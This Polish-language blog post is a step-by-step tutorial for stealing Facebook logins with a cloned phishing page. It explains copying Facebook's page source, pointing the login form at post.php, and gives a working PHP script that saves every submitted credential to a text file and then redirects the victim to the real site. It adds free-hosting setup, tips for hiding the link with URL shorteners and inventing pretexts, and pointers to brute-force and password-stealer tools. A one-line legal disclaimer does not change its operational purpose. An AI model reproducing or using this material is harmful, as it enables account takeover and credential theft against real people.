28 grudnia, 2021

Facebook Hacking jak włamać tworząc stronę Phishing Niestandardowy

Witam i zapraszam do innego Facebook hacking tutorial. Tym razem pokażę Ci, jak ręcznie utworzyć stronę phishingową i włamać się do Facebooka za pomocą phishingu i inżynierii społecznej.

pokażę dwie metody jeden jest łatwy dla początkujących, którzy chcą po prostu przetestować hack, a drugi jest dla tych, którzy chcą nauczyć się hakowania i pentesting i stworzyć swoją własną stronę phishing na Facebooku.

atak phishingowy to metoda ataku używana przez hakerów, w której tworzą oni kopię oryginalnej witryny, która jest dokładnie taka sama jak oryginalna witryna. Następnie, korzystając z inżynierii społecznej i kreatywności, wysyłają łącze phishingowe do ludzi, aby się zalogować. Kiedy ktoś podpisze swoje poświadczenia. Hakerzy mogą łatwo uzyskać nazwę użytkownika i hasło ofiary w formacie tekstowym.

więc w tym samouczku, zamierzam wyjaśnić zarówno łatwy i techniczny sposób hacking facebook z niestandardowej strony phishingu.

łatwa metoda hackowania Facebooka:

  • Pobierz pliki hack: dla telefonów komórkowych i na pulpicie (wolą pulpit, ponieważ są niewykryte)
  • darmowy hosting: 000webhost
  • można rzeczywiście korzystać z dowolnego hostingu, ale chciałbym to zasugerować, ponieważ jest to, co będę używać do tego samouczka.

kroki, aby utworzyć fałszywą stronę phishingową na Facebooku:

Krok 1: odwiedź Stronę 000webhost i kliknij Zarejestruj się za darmo za pomocą dowolnego e-maila. Bardzo ważne jest, aby zweryfikować swój e-mail za pomocą wiadomości weryfikacyjnej, którą otrzymujesz, aby Twoje konto było aktywne.

Krok 2: teraz zarejestruj się za pomocą identyfikatora e-mail, Ustaw hasło i wybierz nazwę witryny, która jest dobra dla phishingu.

Krok 3: po weryfikacji adresu e-mail Kliknij Menedżer plików, a następnie kliknij Prześlij pliki teraz, jak pokazano na poniższym obrazku:

Krok 4: Teraz zostaniesz przekierowany do rzeczywistego menedżera plików Twojej witryny, który jest pokazany poniżej:

Krok 5: zaczniesz od folderu public_html, który jest dokładnie tam, gdzie chcesz być. Prześlij oba pobrane pliki.html i post.php w zależności od tego, czy chcesz włamać mobilną lub stacjonarną wersję Facebooka.

Krok 6: kliknij Prześlij ikonę w prawym rogu menedżera plików, jak pokazano na poniższym obrazku.

Krok 7: Teraz wybierz zarówno indeks plików.htm i post.php i kliknij przycisk Prześlij, jak pokazano na poniższym obrazku:

Krok 8: przejdź do listy witryn w panelu i skopiuj wcześniej utworzony adres łącza do witryny. „Domena, która została stworzona przez hosting”

mobilna strona phishingowa na Facebooku:

niestandardowa strona phishingowa na Facebooku

strona phishingowa na Facebooku:

Krok 9: po zalogowaniu się celu do witryny zobaczysz następujący plik o nazwie nazwa użytkownika.txt w menedżerze plików, jak pokazano poniżej:

krok 10: otwórz plik, aby zobaczyć identyfikator e-mail i hasło konta.

tutaj użyłem: sas i sas jako mojego e-maila i hasła do Facebooka.

Viola, udało Ci się włamać na konto Facebooka za pomocą phishingu.

teraz dla tych, którzy chcą się nauczyć poznajmy szczegóły techniczne hacking facebook ręcznie TUTAJ jest zaawansowana wersja, w której można dokonać plików.

strona phishingowa na Facebooku

zaawansowana metoda: ręczne tworzenie niestandardowej strony phishingowej na Facebooku.

Krok 1: Otwórz facebook.com

aby utworzyć stronę phishing, przejdź do Facebook.com a następnie kliknij prawym przyciskiem myszy pusty obszar. Zobaczysz wiele opcji, które musisz kliknąć na widok strony źródłowej opcja. Jak widać poniżej na obrazku.

Krok 2: Utwórz lokalną kopię strony na Facebooku, aby utworzyć stronę phishingową

po kliknięciu na Wyświetl źródło strony otworzy się nowa karta, Jak pokazano poniżej, pokazując całą wiązkę kodu. To jest kod źródłowy strony na Facebooku. Masz zamiar go edytować, aby można było go użyć do strony phishingowej na Facebooku. Aby to zrobić:

wybierz cały kod i skopiuj cały kod i wklej go do notatnika i zapisz plik jako indeks.htm. Rozszerzenie pliku jest .htm nie .html nie popełnij tego błędu.

Źródło strony na Facebooku

skopiowany kod źródłowy Facebooka do phishingu w notatniku

Krok 3: edytuj kod źródłowy

teraz otwórz notatnik, w którym wkleiłeś ten kod i naciśnij CTRL+F i wpisz akcja na pasku wyszukiwania. Jest to trochę trudne, ale musisz znaleźć następującą linię w kodzie.

action="https://www.facebook.com/login.php?login_attempt=1&lwv=110"
gdy znajdziesz kod podobny do kodu, o którym wspomniałem powyżej, Usuń Cały kod tekstowy przed akcją word i zastąp go słowem post.php jak pokazano poniżej:
wtedy końcowy kod będzie wyglądał tak:
 action="post.php"

źródło strony na Facebooku edytowane pod kątem phishingu

Krok 4: Zapisz pliki

teraz jeśli jeszcze go nie zapisałeś, zapisz go w nowym folderze z indeksem nazw.htm teraz ukończyłeś część pierwszą strony phishingu.

Krok 5: Tworzenie pliku PHP

aby utworzyć drugą część strony phishingowej na Facebooku, musisz utworzyć plik PHP. Nazywam mój plik jako post.php, ponieważ to jest to, co edytowałem w kodzie źródłowym w części pierwszej. Jeśli planujesz użyć innej nazwy, zmień ją w indeksie.htm również.

Otwórz nowy plik notatnika i skopiuj kod podany poniżej i zapisz go z nazwą post.php. Możesz zapoznać się z poniższymi obrazami w celach informacyjnych:

<?phpheader ('Location:http://www.facebook.com/');$handle = fopen("usernames.txt", "a");foreach($_POST as $variable => $value) {fwrite($handle, $variable);fwrite($handle, "=");fwrite($handle, $value);fwrite($handle, "\r\n");}fwrite($handle, "\r\n");fclose($handle);exit;?>

Krok 6: skopiuj pliki phishingowe na Facebooku

teraz pomyślnie utworzyłeś dwa pliki, które należy zapisać w tym samym folderze.

  • indeks.htm
  • post.php

Krok 7: Utwórz konto darmowe konto hostingowe

odwiedź Stronę 000webhost i kliknij Zarejestruj się za darmo za pomocą dowolnego e-maila. Bardzo ważne jest, aby zweryfikować swój e-mail za pomocą wiadomości weryfikacyjnej, którą otrzymujesz, aby Twoje konto było aktywne.

Krok 8: otwórz menedżera plików i prześlij pliki

teraz otwórz Cpanel (Panel sterowania) na pulpicie nawigacyjnym hostingu. Otwórz menedżera plików, a następnie kliknij Menedżer plików przejdź do folderu public_html. Domyślnie powinieneś znajdować się w tym folderze

Krok 9: Prześlij indeks.htm i post.PHP

kliknij przycisk Prześlij pliki i prześlij oba pliki, które wcześniej zapisałeś, jak pokazano na poniższych obrazkach.

krok 10: Upewnij się, że wszystkie pliki zostały przesłane.

upewnij się, że wszystkie pliki phishingowe zostały przesłane, a następnie otwórz swoją witrynę. Powinieneś zobaczyć oryginalną stronę na Facebooku, ale kiedy zobaczysz adres URL, będziesz wiedział, że jest to strona phishingowa

krok 11: przejdź do listy witryn w panelu i skopiuj wcześniej utworzony adres łącza do witryny.

strona phishingowa na Facebooku:

krok 12: po zalogowaniu się celu do witryny zobaczysz następujący plik o nazwie nazwa użytkownika.txt w menedżerze plików, jak pokazano poniżej:

krok 13: Otwórz plik, aby zobaczyć identyfikator e-mail i hasło konta.

tutaj użyłem: sas i sas jako mojego e-maila i hasła do Facebooka.

Viola, udało Ci się włamać na konto Facebooka za pomocą phishingu. To jest Twoja strona phishingowa na Facebooku. Mam nadzieję, że ci się podobało i działało zgodnie z oczekiwaniami.

sztuczki socjotechniczne hakerzy używają do włamania na Facebooka:

1)podczas próby wysłania łącza phishingowego do docelowej ofiary, musisz użyć skrótu URL, takiego jak TinyURL, który pomoże zamaskować domenę.

2) Wybierz dobrą domenę, której będzie ufał cel.

3) Bądź kreatywny. Potrzebny jest dobry pretekst, aby cel nie podejrzewał.

Często zadawane pytania na temat hacking facebook z OSIF

Poniżej znajdują się niektóre z pytań, które mogą przyjść do głowy podczas próby korzystania z tego siekać. Jeśli twoje pytanie nie jest obecne, uprzejmie wymień je w sekcji komentarzy.

Czy to narzędzie hacking legalne używać na nikogo?

Nie, Nie powinieneś używać tej wiedzy do hakowania ludzi. Jeśli użyjesz go do włamania czyjegoś konta na Facebooku, jest to uważane za przestępstwo i będziesz odpowiedzialny za wszelkie nielegalne działania, które robisz. Ale można go używać do testowania i zdobywania wiedzy o tym, jak hakerzy włamać facebook za pomocą phishingu i innych ataków.

Czy są jakieś alternatywy dla tej metody?

Tak, Istnieje wiele metod włamania konta facebook. Najbardziej znane to zshadow, shadowave i anomor. Możesz także użyć Kali Linux do włamania na Facebooka, tworząc niestandardową stronę phishingową.

Czy są jakieś inne sposoby niż phishing?

Bruteforce i narzędzia takie jak Facebook password extractor będą działać. Możesz również użyć USB stealer do hakowania kont na Facebooku.

To nie działa co mam zrobić?

upewnij się, że plik ma .rozszerzenie htm i nie .html. Porównaj moje pliki z Twoimi. Spróbuj krok po kroku. Telefon komórkowy może działać, ale nie musi, ponieważ może być łatwo wykryty.

Dodaj komentarz

Twój adres e-mail nie zostanie opublikowany.